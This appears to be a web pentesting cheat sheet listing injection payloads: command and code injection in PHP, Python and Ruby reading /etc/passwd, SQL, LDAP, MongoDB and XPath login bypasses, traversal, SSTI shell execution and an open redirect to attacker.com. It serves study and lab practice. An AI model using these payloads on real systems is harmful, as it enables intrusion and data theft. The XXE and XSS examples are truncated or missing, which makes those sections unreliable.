Web Basics: Common Vulnerabilities and Exploitation Techniques

MySQL: Trailing Space Ignorance

MySQL normalizes strings by ignoring trailing spaces in comparisons:

'pentesterlab' = 'pentesterlab   '

This can be exploited in authentication bypass or logic flaws where space-padded inputs are accepted as valid.

Authorization Bypass via Parameter Injection

If an application uses array-like parameters:

user[username]=test&user[password]=test

You can inject:

user[username]=test&user[admin]=true

This may elevate privileges if the backend processes parameters unsafely.

Code Execution Detection

To confirm code injection (e.g., in PHP), use these techniques:

• String concatenation: Replace input with "."ha"."cker"." to break syntax and observe errors.
• Comments: Use /*random*/ to test if injection point accepts comments.
• Inject payload:

{url}/?name=".system('cat /etc/passwd');"

{url}?order=id);}system('cat /etc/passwd');//

PHP: Dangerous PCRE_REPLACE_EVAL (/e modifier)

The /e modifier in preg_replace evaluates the replacement string as PHP code:

preg_replace('/pattern/e', $_GET['input'], 'text');

Note: This modifier is deprecated since PHP 5.5.0 due to its high risk.

Python: Code Injection in Templates

In Python-based apps (e.g., Flask), try:

{url}/hello/hacker"%2b str(os.popen('cat /etc/passwd').read())%2b"

If os is not imported:

{url}/hello/hacker"%2bstr(__import__('os').popen('cat /etc/passwd').read())%2b"

Or use Base64 encoding to bypass filters:

{url}/hello/hacker"%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dk')).read())%2b"

Ruby: Command Injection

In Ruby CGI scripts:

{url}/cgi-bin/hello?name=hacker'.cat+/etc/passwd.'

This executes cat /etc/passwd if input is interpolated unsafely.

Command Execution Techniques

Chain commands using shell operators:

• command1 && command2 - run second if first succeeds
• command1 || command2 - run second if first fails
• command1 ; command2 - run both sequentially
• command1 | command2 - pipe output of first to second

Example:

ping=127.0.0.1; cat /etc/passwd

Use command substitution:

ping=`cat /etc/passwd`
ping=$(cat /etc/passwd)

Directory Traversal

Access restricted files using path traversal:

../../../../etc/passwd

Use null byte to terminate extension (if vulnerable):

../../../../etc/passwd%00

Useful when backend appends an extension (e.g., .php) to user input.

LDAP Injection

LDAP supports logical operators:

• OR: (|(cn=input1)(cn=input2))
• AND: (&(cn=input1)(userPassword=password))

Example bypass:

username=hacker')(cn=*))%00&password=anything

Resulting filter:

(&(cn=hacker)(cn=*))%00(userPassword=password))

This returns all entries and bypasses authentication.

MongoDB Injection

or becomes ||. Use null byte to close queries:

' || 1==1 %00

Or use comments to ignore the rest:

' || 1==1 //

Open Redirect

Replace a domain with a double-slash to preserve protocol:

https://example.com/redirect?url=//attacker.com

Becomes: https://attacker.com - leading to phishing or SSRF.

SQL Injection: MySQL Login Bypass

Bypass login with:

admin' OR 1=1 LIMIT 1--

Or exploit GBK character set (Chinese encoding) for quote bypass:

SET CHARACTER SET 'GBK';

Use %bf%27 to create an unescaped single quote:

admin%bf%27//or//1=1#

Server-Side Template Injection (SSTI)

Jinja2 (Flask):

{{''.__class__.__mro__[2].subclasses()[233]("id", shell=True, stdout=-1).communicate()}}

Twig (PHP):

{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

XML External Entity (XXE) Injection

Read local files via DTD:

]>
&x;

XPath Injection

Similar to SQLi, use logic to test:

• ' and '1'='1 > should return results
• ' or '1'='0 > should return results
• ' and '1'='0 > no results
• ' or '1'='1 > all results

Use null byte to comment out the rest:

hacker' or 1=1]/parent::*/child::node()%00

Cross-Site Scripting (XSS)

Basic XSS:

Use String.fromCharCode() to obfuscate:

DOM-based exfiltration:

See Also

• Metasploit: Scanning a Website with Wmap
• Unix/Linux Security: Essential Commands and Privilege Escalation